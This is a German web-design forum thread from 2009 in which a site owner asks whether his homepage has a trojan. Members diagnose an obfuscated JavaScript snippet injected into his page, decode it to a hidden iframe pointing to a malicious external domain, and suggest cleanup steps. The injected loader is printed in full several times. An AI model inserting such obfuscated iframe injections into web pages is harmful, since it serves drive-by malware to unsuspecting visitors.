mediengestalter.info
FAQ :: Mitgliederliste :: MGi Team

Willkommen auf dem Portal für Mediengestalter

Aktuelles Datum und Uhrzeit: Mo 28.09.2020 04:54 Benutzername: Passwort: Auto-Login

Thema: Homepage befallen? vom 09.04.2009


Neues Thema eröffnen   Neue Antwort erstellen MGi Foren-Übersicht -> Web-Hosting und Internetzugang -> Homepage befallen?
Autor Nachricht
marco123
Threadersteller

Dabei seit: 19.05.2005
Ort: Hannover
Alter: 47
Geschlecht: Männlich
Verfasst Do 09.04.2009 15:28
Titel

Homepage befallen?

Antworten mit Zitat Zum Seitenanfang

Hi All, also ich habe eben eine Mail von jemandem bekommen, der behauptet das eventuell meine Seite http://www.anglerzeitung.de von einem Trojaner befallen wurde. Der Mann hat Kaspersky als Virenschutz drauf und der soll gemeckert haben.

Jetzt bin ich total verunsichert. Ich möchte natürlich nicht mit meiner Homepage einen Trojaner verbreiten. Wie kann man das überprüfen und was kann ich jetzt tun? Und danach, wie kann ich meine Seite schützen? Hat jemand ähnliches erlebt?

Würde mich sehr freuen, wenn man mir weiterhelfen könnte.
Danke im Voraus.
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
xaos

Dabei seit: 06.10.2004
Ort: Kargath
Alter: -
Geschlecht: -
Verfasst Do 09.04.2009 15:57
Titel

Antworten mit Zitat Zum Seitenanfang

Am Ende des Quelltextes deiner Seite steht folgender Eintrag:

Code:
<!-- o65 --><Script Language='Javascript'>
<!--
document.write(unescape('%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%57%49%44%54%48%3A%20%30%25%3B%20%48%45%49%47%48%54%3A%20%30%70%78%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%79%66%75%63%6B%69%6E%67%2D%70%75%73%73%79%2E%63%6F%6D%2F%74%79%72%65%6B%2F%3F%74%3D%35%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%30%20%73%63%72%6F%6C%6C%69%6E%67%3D%6E%6F%20%0A%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3E%3C%2F%49%46%52%41%4D%45%3E'));
//-->
</Script><!-- c65 -->


Was decodiert folgendes ergibt:

Code:
<IFRAME style="WIDTH: 0%; HEIGHT: 0px" src="http://myfucking-pussy.com/tyrek/?t=5" frameBorder=0 scrolling=no allowTransparency></IFRAME>


Ich vermute mal das stammt nicht von dir.
Ich sehe 3 Möglichkeiten:

1. Dein lokales System ist infiziert und hängt das beim hochladen auf den Server dran
2. Deine Webseite hat irgendwo eine Sicherheitslücke, hervorgerufen durch irgendwelche lustige Skripte
3. Der Server deines Providers wurde gehackt
  View user's profile Private Nachricht senden
Anzeige
Anzeige
marco123
Threadersteller

Dabei seit: 19.05.2005
Ort: Hannover
Alter: 47
Geschlecht: Männlich
Verfasst Do 09.04.2009 23:35
Titel

Antworten mit Zitat Zum Seitenanfang

Auweia, myfucking-pussy.com Au weia! Ne, ist nicht von mir.

Hab den ganzen Tag damit verbracht den Mist zu beheben. Jetzt hat der Programmierer den Fehler behoben. Allerdings bleibt noch zu klären, wie das reinkam. Kann sowas durch iframes reinkommen? Zumindest 2 sind nicht so ganz astreine Quellen, z.B. die Shoutbox die ich jetzt erstmal weggelassen habe. Und noch ne Topliste.

Ist mit einem CMS erstellt, also alles online. In der Index Datei war ein Script was das bewirkt. Reingekommen ist es vermutlich durch ein wie du sagst lustiges Script a la shoutbox.

Der Server vom Provider glaub ich eher nicht, hab mit denen auch schon gesprochen.

Na, mal sehen.
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
nel

Dabei seit: 18.09.2004
Ort: Köln
Alter: -
Geschlecht: Männlich
Verfasst Do 16.04.2009 11:40
Titel

Antworten mit Zitat Zum Seitenanfang

marco123 hat geschrieben:
Auweia, myfucking-pussy.com Au weia! Ne, ist nicht von mir.

Hab den ganzen Tag damit verbracht den Mist zu beheben. Jetzt hat der Programmierer den Fehler behoben. Allerdings bleibt noch zu klären, wie das reinkam. Kann sowas durch iframes reinkommen? Zumindest 2 sind nicht so ganz astreine Quellen, z.B. die Shoutbox die ich jetzt erstmal weggelassen habe. Und noch ne Topliste.

Ist mit einem CMS erstellt, also alles online. In der Index Datei war ein Script was das bewirkt. Reingekommen ist es vermutlich durch ein wie du sagst lustiges Script a la shoutbox.

Der Server vom Provider glaub ich eher nicht, hab mit denen auch schon gesprochen.

Na, mal sehen.


igrgendjemand muss direkten schreibzugriff auf die html/php files gehabt haben, um den code da einzuarbeiten
  View user's profile Private Nachricht senden
worshipper

Dabei seit: 01.10.2004
Ort: worshipper fear satan
Alter: -
Geschlecht: Männlich
Verfasst Do 16.04.2009 12:36
Titel

Antworten mit Zitat Zum Seitenanfang

xaos hat geschrieben:
Am Ende des Quelltextes deiner Seite steht folgender Eintrag:

Code:
<!-- o65 --><Script Language='Javascript'>
<!--
document.write(unescape('%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%57%49%44%54%48%3A%20%30%25%3B%20%48%45%49%47%48%54%3A%20%30%70%78%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%79%66%75%63%6B%69%6E%67%2D%70%75%73%73%79%2E%63%6F%6D%2F%74%79%72%65%6B%2F%3F%74%3D%35%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%30%20%73%63%72%6F%6C%6C%69%6E%67%3D%6E%6F%20%0A%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3E%3C%2F%49%46%52%41%4D%45%3E'));
//-->
</Script><!-- c65 -->


Was decodiert folgendes ergibt:

Code:
<IFRAME style="WIDTH: 0%; HEIGHT: 0px" src="http://myfucking-pussy.com/tyrek/?t=5" frameBorder=0 scrolling=no allowTransparency></IFRAME>


Ich vermute mal das stammt nicht von dir.
Ich sehe 3 Möglichkeiten:

1. Dein lokales System ist infiziert und hängt das beim hochladen auf den Server dran
2. Deine Webseite hat irgendwo eine Sicherheitslücke, hervorgerufen durch irgendwelche lustige Skripte
3. Der Server deines Providers wurde gehackt


mit welchem Programm hast denn du das rausgefunden?
  View user's profile Private Nachricht senden
sahnemuh

Dabei seit: 19.06.2003
Ort: /dev/null
Alter: 39
Geschlecht: Männlich
Verfasst Do 16.04.2009 14:49
Titel

Antworten mit Zitat Zum Seitenanfang

editor auf:

Code:
<html>
<head><title>bla</title>/head><body><script type="text/javascript">
alert(unescape('%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%57%49%44%54%48%3A%20%30%25%3B%20%48%45%49%47%48%54%3A%20%30%70%78%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%79%66%75%63%6B%69%6E%67%2D%70%75%73%73%79%2E%63%6F%6D%2F%74%79%72%65%6B%2F%3F%74%3D%35%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%30%20%73%63%72%6F%6C%6C%69%6E%67%3D%6E%6F%20%0A%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3E%3C%2F%49%46%52%41%4D%45%3E'));
</script></body></html>


strg+s -> bla.html
editor zu.
seite aufrufen.
  View user's profile Private Nachricht senden
JanG

Dabei seit: 13.10.2002
Ort: Köln/Düsseldorf
Alter: -
Geschlecht: Männlich
Verfasst Do 16.04.2009 15:31
Titel

Antworten mit Zitat Zum Seitenanfang

Teste mal folgendes aus:

Lade alle main, default, home, index und ich glaube start nochmal neu hoch.
Egal ob htm, php etc.

Hatte das Problem letztens bei nem Kunden auch,
aber der Trojaner kam vom Host, da dort einer den Trojaner drauf hatte und für alle webs den Zugang.

Peaze!

P.S. Bei den meisten kam die Fehlermeldung auch nur im IE.
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
nicer

Dabei seit: 22.05.2007
Ort: Berlin
Alter: 34
Geschlecht: Männlich
Verfasst Do 16.04.2009 16:22
Titel

Antworten mit Zitat Zum Seitenanfang

geilo... der trick ist gut
  View user's profile Private Nachricht senden
 
Ähnliche Themen kostenlose Homepage anbieter
Kosten Farbfotos auf Homepage?
Adresse und Festnetztelefon für Homepage?
Fragen zum Einrichten einer Homepage
Eigene Homepage erstellen
Wie erstellt man eine homepage für´s Hosting?
Neues Thema eröffnen   Neue Antwort erstellen
MGi Foren-Übersicht -> Web-Hosting und Internetzugang


Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst an Umfragen in diesem Forum nicht mitmachen.